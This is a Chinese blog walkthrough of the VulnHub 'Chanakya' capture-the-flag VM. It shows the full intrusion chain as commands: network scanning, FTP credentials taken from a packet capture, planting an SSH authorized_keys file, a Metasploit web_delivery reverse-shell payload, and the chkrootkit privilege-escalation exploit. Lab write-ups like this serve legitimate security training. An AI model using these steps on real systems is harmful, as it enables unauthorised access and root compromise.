vulnhub-chanakya

最新推荐文章于 2024-09-19 09:21:20 发布
最新推荐文章于 2024-09-19 09:21:20 发布
阅读量58 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130003674
版权

chanakya

1.信息收集

nmap -sP 192.168.14.0/24
nmap -sV -p- 192.168.14.186


dirb http://192.168.14.186 -X ".txt,.php"


wget http://192.168.14.186/abuse.txt


<?php
echo str_rot13("nfubxn.cpncat")
?>


wget http://192.168.14.186/ashoka.pcapng



ashoka;kautilya

ftp 192.168.14.186

2.漏洞利用

ssh-keygen


cd /root/.ssh
mv id_rsa.pub authorized_keys


lcd /root/.ssh
mkdir .ssh
cd .ssh
put authorized_keys


ssh ashoka@192.168.14.186

3.提权

首先,利用反弹shell模块,为我们提供一个在目标机器上的meterpreter。

search web_de
use exploit/multi/script/web_delivery
set lhost 192.168.14.186
set lport 3333
set uripath /
exploit 生成


下面进行提权模块利用,成功利用 Chkrootkit模块提权root

back
search chkrootkit
use exploit/unix/local/chkrootkit
set sessions 1
run


Wh1teSu
关注
专栏目录
Chanakya:完全从零开始使用C ++构建的可扩展,可定制且简单的聊天机器人。 您可以完全选择聊天机器人的专业领域。 现在,有了插件!
02-05
** Chanakya 聊天机器人项目概述 ** Chanakya 是一个由 C++ 开发的聊天机器人项目,它的设计目标是提供一个可扩展、可定制且简单的平台,让用户能够根据自己的需求定制聊天机器人的专业领域。这个项目特别强调了...
image_classifier_template
02-10
感谢FastAI团队,Naveen Chanakya和Flutter团队。 我将一些不同的教程集成在一起,形成了一个SaaS管道模板。 这是Siraj Raval在YouTube上制作视频的代码,用于构建图像分类启动程序。 这里有3个组成部分; Web API,...
VulnHub-HA_Chanakya
blue_fantasy的博客
01-11 646
Text. HackTheNmae:HA Chanakya The Mastermind that took down kingdoms is back and this time he has created a puzzle that would make you scratch you brains! It’s time to face Chanakya. Will you be able to solve this Boot to Root and prove that you are wiser
HA:chanakya靶机渗透
Rex_Surprise的博客
05-19 404
HA:chanakya靶机渗透 1. 环境和信息 1.1 靶机下载地址 1.2 环境 1.3 信息 2. 渗透过程 2.1 信息收集 2.2 开始渗透 3. 重要信息 3.1 FTP账号密码 HA:chanakya靶机渗透1. 环境和信息1.1 靶机下载地址 点击下载[chanakya.zip] 1.2 环境 攻击环境:kali l...
记一次Chanakya靶机的渗透测试
2401_84466316的博客
05-28 713
首先需要登陆的靶机使用ssh-keygen生成一个密钥,然后使用cat id_rsa.pub>authorized_keys生成一个密钥文件,将这个密钥文件传输到需要被登陆的机器的用户的根目录中的.ssh/文件夹下,然后就可以直接ssh登陆,从而不需要密码到靶机上,直接ssh进行连接就可以连接到ashoka用户。指定文件则会扫描出来关键的目录,.html结尾的文件都是主页上可以打开的文件,而关键性文件则是abuse.txt文件。发现回显,根据服务器开启的服务分析回显的文本,并没有任何头绪,
app store android ni,‎App Store 上的“Chanakya Ni Pothi”
weixin_39790717的博客
05-29 58
Chanakya is the No.1 Gujarati Investment Weekly which provides in-depth news and analysis on the Indian Stock Markets , IPOs, Mutual Funds, Bullion and many other investment avenues. It provides techn...
oracle自带表emp和s_emp的初始脚本
halazi100
09-10 8249
emp目录下共有demobld.sql和demodrop.sql两个文件 s_emp目录有summit2.sql文件 以下是文件及文件内容,保存为对应文件即可 demobld.sql -- -- Copyright (c) Oracle Corporation 1988, 2000. All Rights Reserved. -- -- NAME -- demobld.sql --
Oracle用户创建及权限设置
halazi100
09-10 1093
Oracle默认自带3个用户     sys;//系统管理员,拥有最高权限  system;//本地管理员,次高权限  scott;//普通用户,密码默认为tiger,默认未解锁 首先以系统管理员身份登陆,解锁scott用户并重置密码为oracle     sqlplus / as sysdba #或者sqlplus sys as sysdba     alter user
mybatis的学习[1]
落霞与孤鹜齐飞,秋水共长天一色
06-28 372
mybatis学习当中遇到的问题 建立mybatis的配置文件时头文件报错 mapper.xml中sql语句的写法需要注意 sql映射文件中的增删改查 mapper接口开发dao 学习步骤 第一步: 1.在maven工程里面引入mybatis的依赖 https://mvnrepository.com/ (到maven仓库找到你想要使用的mybatis版本) http://www.m...
CentOS_6安装Oracle_11g_R2手记
halazi100
09-09 1662
本文共分为安装,设置开机启动,用户创建及权限设置几个部分;可以创建出一个可用的数据库及操作用户来实践;
相关表格2
ljcfreecsdn的专栏
10-28 323
rem rem $Header: summit2.sql 27-jun-2000.12:30:22 slari Exp $ rem rem Copyright (c) 1991, 2000 Oracle Corporation.  All rights reserved. rem rem  NAME rem      summit2.sql - rem  DESCRIPTION
itpub.net]summit2
12-19
'11368 Chanakya', 'New Delhi', NULL, 'India', NULL, 'GOOD', 14, 4, NULL); INSERT INTO s_customer VALUES ( 204, 'Womansport', '1-206-104-0103', '281 King Street', 'Seattle', 'Washington', 'USA', ...
【双语新闻】AGI安全与对齐,DeepMind近期工作
qq_29883477的博客
09-13 1118
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。
lsh11111的博客
09-13 528
此外,BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中,BootROM会根据宽度检测参数值来选择相应的I/O配置,以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息,特别是在LQSPI地址空间中的默认0x01F中断向量被更改时,在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。
【农信网-注册/登录安全分析报告】
09-16 1406
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 604
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
国庆旅游高峰期,景区如何利用可视化大屏保障游客安全
最新发布
Leo的博客
09-19 796
国庆假期即将来临,中国文化和旅游部发布的数据显示,今年国庆期间国内旅游市场将迎来爆发式增长,预计出游人次将达到8.96亿,同比增长86%,旅游收入预计将达到7825亿元人民币,同比增长138%。这一繁荣景象无疑给各大景区带来了巨大的客流量和经济收益,但同时也带来了不小的安全管理挑战。在人潮涌动的旅游高峰期,如何确保游客的安全,成为景区管理的重中之重。本文将探讨在国庆旅游高峰期,景区如何利用可视化大屏,通过实时监控、数据分析和智能响应,有效保障游客的安全
网络安全宣传周 | DNS安全威胁与应对措施分享
weixin_53018687的博客
09-12 1222
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
【iOS逆向与安全】frida-trace命令大全
六桥风月IT随笔
09-13 590
【代码】【iOS逆向与安全】frida-trace命令大全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值